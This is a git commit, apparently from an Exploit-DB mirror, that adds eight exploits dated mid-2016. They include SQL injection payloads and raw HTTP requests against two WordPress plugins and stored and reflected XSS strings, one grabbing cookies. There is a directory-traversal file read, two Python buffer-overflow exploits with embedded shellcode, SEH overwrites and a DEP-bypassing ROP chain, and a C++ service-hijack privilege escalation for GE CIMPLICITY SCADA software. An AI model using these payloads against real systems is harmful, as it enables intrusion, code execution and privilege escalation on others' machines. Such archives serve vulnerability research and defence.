DB: 2016-07-08
8 new exploits WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities Codoforum 3.4 - Stored Cross-Site Scripting MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass) Core FTP LE 2.2 - Path Field Local Buffer Overflow OPAC KpwinSQL - Multiple Vulnerabilities GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation
This commit is contained in:
parent
52cf6a3185
commit
c7daadde64
9 changed files with 433 additions and 0 deletions
|
@ -36002,6 +36002,8 @@ id,file,description,date,author,platform,type,port
|
|||
39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
|
||||
39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
|
||||
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
|
||||
39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
|
||||
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
|
||||
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
|
||||
|
@ -36196,7 +36198,10 @@ id,file,description,date,author,platform,type,port
|
|||
40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
|
||||
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
|
||||
40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Stored Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80
|
||||
40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
|
||||
40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
|
||||
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
|
||||
40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
|
||||
40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
|
||||
40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
|
||||
|
@ -36215,6 +36220,7 @@ id,file,description,date,author,platform,type,port
|
|||
40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
|
||||
40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
|
||||
40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
|
||||
40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0
|
||||
40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
|
||||
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
|
||||
40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
|
||||
|
@ -36238,3 +36244,5 @@ id,file,description,date,author,platform,type,port
|
|||
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
|
||||
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
|
||||
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
|
||||
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
|
||||
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
71
platforms/php/webapps/39806.txt
Executable file
71
platforms/php/webapps/39806.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
|
||||
# Google Dork: inurl:"wp-content/plugins/q-and-a"
|
||||
# Date: 12-05-2016
|
||||
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
|
||||
# Version: 1.3.9.7 and prior
|
||||
# Exploit Author: Gwendal Le Coguic
|
||||
# Website: http://10degres.net
|
||||
# Category: webapps
|
||||
|
||||
|
||||
Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
|
||||
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
|
||||
|
||||
The plugin was originally named "Q and A FAQ" and developped by Raygun company
|
||||
then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
|
||||
|
||||
|
||||
##### Full Path Disclosure #####
|
||||
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
|
||||
|
||||
|
||||
##### SQL Injection #####
|
||||
|
||||
Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
|
||||
|
||||
Paramater hdnParentID is vulnerable in two places.
|
||||
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
|
||||
|
||||
1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
|
||||
|
||||
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
|
||||
Host: [target]
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 165
|
||||
|
||||
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
|
||||
|
||||
|
||||
2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
|
||||
|
||||
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
|
||||
Host: [target]
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 84
|
||||
|
||||
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
|
||||
|
||||
|
||||
##### References #####
|
||||
|
||||
https://www.owasp.org/index.php/Full_Path_Disclosure
|
||||
https://www.owasp.org/index.php/SQL_Injection
|
||||
|
62
platforms/php/webapps/39807.txt
Executable file
62
platforms/php/webapps/39807.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
|
||||
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
|
||||
# Date: 12-05-2016
|
||||
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
|
||||
# Version: 1.8.9 and prior
|
||||
# Exploit Author: Gwendal Le Coguic
|
||||
# Website: http://10degres.net
|
||||
# Category: webapps
|
||||
|
||||
|
||||
##### About #####
|
||||
|
||||
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
|
||||
|
||||
|
||||
##### Full Path Disclosure #####
|
||||
|
||||
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
|
||||
|
||||
|
||||
##### SQL Injection #####
|
||||
|
||||
Headers X-Forwarded-For and Client-Ip are vulnerable.
|
||||
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
|
||||
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
|
||||
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: [target]
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Client-Ip: 123.123.123.123
|
||||
X-Forwarded-For: 123.123.123.123
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 89
|
||||
|
||||
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
|
||||
|
||||
|
||||
### Extras infos #####
|
||||
|
||||
The "galleryid" must be configured or try another id.
|
||||
|
||||
You don't need to be authed to exploit the injection but the plugin must be enable.
|
||||
|
||||
"task" parameter can be:
|
||||
load_images_content
|
||||
load_images_lightbox
|
||||
load_image_justified
|
||||
load_image_thumbnail
|
||||
load_blog_view
|
||||
|
||||
Client-Ip overwrite X-Forwarded-For.
|
||||
Some system drop those headers.
|
||||
|
||||
|
||||
##### References #####
|
||||
|
||||
https://www.owasp.org/index.php/Full_Path_Disclosure
|
||||
https://www.owasp.org/index.php/SQL_Injection
|
||||
|
31
platforms/php/webapps/40015.txt
Executable file
31
platforms/php/webapps/40015.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
|
||||
# Google Dork: intext:"powered by codoforum"
|
||||
# Date: 01/06/2016
|
||||
# Exploit Author: Ahmed Sherif (OffensiveBits)
|
||||
# Vendor Homepage: http://codologic.com/page/
|
||||
# Software Link: http://codoforum.com/index.php
|
||||
# Version: V3.4
|
||||
# Tested on: Linux Mint
|
||||
|
||||
|
||||
1. Description:
|
||||
|
||||
The Reply and search functionalities are both vulnerable to Stored XSS due
|
||||
to improper filtration in displaying the content of replies.
|
||||
|
||||
|
||||
2. Steps to reproduce the vulnerability:
|
||||
|
||||
|
||||
1. Login to your account.
|
||||
2. look for any topic and add a reply .
|
||||
3. in the reply textbox add a widely used common keyword within xss
|
||||
payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
|
||||
4. while any user surfing the topic and started to search for specific
|
||||
keywords the javascript code will be executed.
|
||||
|
||||
|
||||
|
||||
3. Solution:
|
||||
|
||||
The new version of codoforum will be released this week.
|
36
platforms/php/webapps/40068.txt
Executable file
36
platforms/php/webapps/40068.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
OPAC KpwinSQL LFI/XSS Vulnerabilities
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Product Website : http://www.kpsys.cz/
|
||||
Affected version: All
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
|
||||
Description:
|
||||
KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
|
||||
+ index.php
|
||||
+ help.php
|
||||
+ logpin.php
|
||||
+ brow.php
|
||||
+ indexs.php
|
||||
+ search.php
|
||||
+ hledani.php
|
||||
+ hled_hesl.php
|
||||
before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
|
||||
|
||||
Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Tested on: Apache/2.2.11 (Win32)
|
||||
PHP/5.2.9-2
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Vulnerabilities discovered by Yakir Wizman
|
||||
https://www.linkedin.com/in/yakirwizman
|
||||
Date: 06.07.2016
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Proof Of Concept:
|
||||
|
||||
Local File Inclusion example:
|
||||
http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
||||
|
||||
Cross Site Scripting example:
|
||||
http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze
|
33
platforms/windows/dos/40038.py
Executable file
33
platforms/windows/dos/40038.py
Executable file
|
@ -0,0 +1,33 @@
|
|||
'''
|
||||
# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
|
||||
# Date: 2016-6-28
|
||||
# Exploit Author: Netfairy
|
||||
# Vendor Homepage: http://www.coreftp.com/
|
||||
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
|
||||
# Version: 2.2
|
||||
# Tested on: Windows7 Professional SP1 En x86
|
||||
# CVE : N/A
|
||||
[+] Type : Buffer overflow
|
||||
[+] Detail :
|
||||
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
|
||||
[-] enter the application and Input "A"*800 to the path box the press enter
|
||||
[-] crash info
|
||||
0:008> g
|
||||
(4d48.4cc8): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
|
||||
eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0 nv up ei pl nz na po nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
|
||||
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
|
||||
coreftp+0x10041:
|
||||
00410041 008b45fc8be5 add byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
|
||||
|
||||
|
||||
########generate "A"*800
|
||||
'''
|
||||
|
||||
import struct
|
||||
junk = "A" * 800
|
||||
with open("exp.txt","wb") as f :
|
||||
f.write(junk)
|
45
platforms/windows/local/40017.py
Executable file
45
platforms/windows/local/40017.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
|
||||
# Date: 25-June-2016
|
||||
# Exploit Author: Sibusiso Sishi
|
||||
# Email: sibusiso [at] IronSky [dot] co.za
|
||||
# Vendor Homepage: http://www.mediacoderhq.com/
|
||||
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
|
||||
# Version: 0.8.43.5830
|
||||
# Tested on: Windows XP SP3 EN
|
||||
|
||||
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
|
||||
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
|
||||
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
|
||||
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
|
||||
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
|
||||
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
|
||||
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
|
||||
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
|
||||
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
|
||||
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
|
||||
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
|
||||
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
|
||||
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
|
||||
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
|
||||
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
|
||||
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")
|
||||
|
||||
|
||||
seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
|
||||
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
|
||||
nop_sled = "\x90" * 14
|
||||
|
||||
buff = "http:// "
|
||||
buff += "A" * 776
|
||||
buff += nseh
|
||||
buff += seh
|
||||
buff += nop_sled
|
||||
buff += shellcode
|
||||
buff += "D" * (4216 - (len(shellcode + nop_sled)))
|
||||
fo = open("foo.m3u", "wb")
|
||||
fo.write (buff)
|
||||
fo.close()
|
88
platforms/windows/local/40018.py
Executable file
88
platforms/windows/local/40018.py
Executable file
|
@ -0,0 +1,88 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
|
||||
# Date: 26-06-2016
|
||||
# Exploit Author: secfigo
|
||||
# Vendor Homepage: http://vuplayer.com/
|
||||
# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
|
||||
# Version: VUPlayer <=2.49
|
||||
# Tested on: Windows 7 SP1 DEP=alwayson
|
||||
# Greetz: Raghu, nullSingapore
|
||||
###################################################################################
|
||||
|
||||
|
||||
import struct
|
||||
|
||||
###################################################################################
|
||||
# Shellcode
|
||||
# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
|
||||
###################################################################################
|
||||
|
||||
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
|
||||
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
|
||||
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
|
||||
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
|
||||
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
|
||||
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
|
||||
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
|
||||
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
|
||||
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
|
||||
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
|
||||
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
|
||||
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
|
||||
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
|
||||
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
|
||||
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
|
||||
"\x1c\x80")
|
||||
|
||||
junk = "HTTP://" + "A"*1005
|
||||
|
||||
|
||||
|
||||
|
||||
###################################################################################
|
||||
# rop gadgets with some modifications
|
||||
# bad characters = "\x00\x09\x0a\x0d\x1a"
|
||||
###################################################################################
|
||||
|
||||
def create_rop_chain():
|
||||
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
rop_gadgets = [
|
||||
0x10010157, # POP EBP # RETN [BASS.dll]
|
||||
0x10010157, # skip 4 bytes [BASS.dll]
|
||||
0x10015f77, # POP EAX # RETN [BASS.dll]
|
||||
0xfffffdff, # Value to negate, will become 0x00000201
|
||||
0x10014db4, # NEG EAX # RETN [BASS.dll]
|
||||
0x10032f72, # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
|
||||
0x10015f82, # POP EAX # RETN [BASS.dll]
|
||||
0xffffffc0, # Value to negate, will become 0x00000040
|
||||
0x10014db4, # NEG EAX # RETN [BASS.dll]
|
||||
0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll]
|
||||
0x101049ec, # POP ECX # RETN [BASSWMA.dll]
|
||||
0x101082db, # &Writable location [BASSWMA.dll]
|
||||
0x1001621c, # POP EDI # RETN [BASS.dll]
|
||||
0x1001dc05, # RETN (ROP NOP) [BASS.dll]
|
||||
0x10604154, # POP ESI # RETN [BASSMIDI.dll]
|
||||
0x10101c02, # JMP [EAX] [BASSWMA.dll]
|
||||
0x10015fe7, # POP EAX # RETN [BASS.dll]
|
||||
0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
|
||||
0x1001d7a5, # PUSHAD # RETN [BASS.dll]
|
||||
0x10022aa7, # ptr to 'jmp esp' [BASS.dll]
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||
|
||||
rop_chain = create_rop_chain()
|
||||
|
||||
|
||||
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
|
||||
|
||||
nops ="\x90"* 16
|
||||
|
||||
buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))
|
||||
|
||||
print "[+] Creating .m3u file of size "+ str(len(buffer))
|
||||
file = open('vuplayer-dep.m3u','w');
|
||||
file.write(buffer);
|
||||
file.close();
|
||||
print "[+] Done creating the file"
|
59
platforms/windows/local/40069.cpp
Executable file
59
platforms/windows/local/40069.cpp
Executable file
|
@ -0,0 +1,59 @@
|
|||
/*
|
||||
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
|
||||
# Vulnerability Discovery and Exploit Author: Zhou Yu
|
||||
# Email: <504137480@qq.com>
|
||||
# Version: 8.2
|
||||
# Tested on: Windows 7 SP1 X32
|
||||
# CVE : None
|
||||
|
||||
Vulnerability Description:
|
||||
SERVICE_CHANGE_CONFIG Privilege Escalation
|
||||
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
|
||||
CimProxy
|
||||
Medium Mandatory Level (Default) [No-Write-Up]
|
||||
RW Everyone
|
||||
SERVICE_ALL_ACCESS
|
||||
|
||||
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
|
||||
[SC] QueryServiceConfig <EFBFBD>ɹ<EFBFBD>
|
||||
|
||||
SERVICE_NAME: CimProxy
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
|
||||
Proxy.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : CIMPLICITY Proxy Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
Usage:
|
||||
Put evil.exe and the exploit in the same folder and then run the exploit.
|
||||
*/
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
void main()
|
||||
{
|
||||
char szPath[MAX_PATH];
|
||||
char *t;
|
||||
GetModuleFileName(NULL,szPath,MAX_PATH);
|
||||
t = strrchr(szPath, 0x5C);
|
||||
t[0] = '\\';
|
||||
t[1] = '\0';
|
||||
strcat(szPath,"evil.exe\"");
|
||||
char t1[] = "\"cmd.exe /c ";
|
||||
char payload[] = "sc config CimProxy binPath= ";
|
||||
strcat(t1,szPath);
|
||||
strcat(payload,t1);
|
||||
|
||||
system(payload);
|
||||
//stop service
|
||||
printf("stop service!\n");
|
||||
system("net stop CimProxy");
|
||||
//start service
|
||||
printf("start service!\n");
|
||||
system("net start CimProxy");
|
||||
|
||||
}
|
Loading…
Add table
Reference in a new issue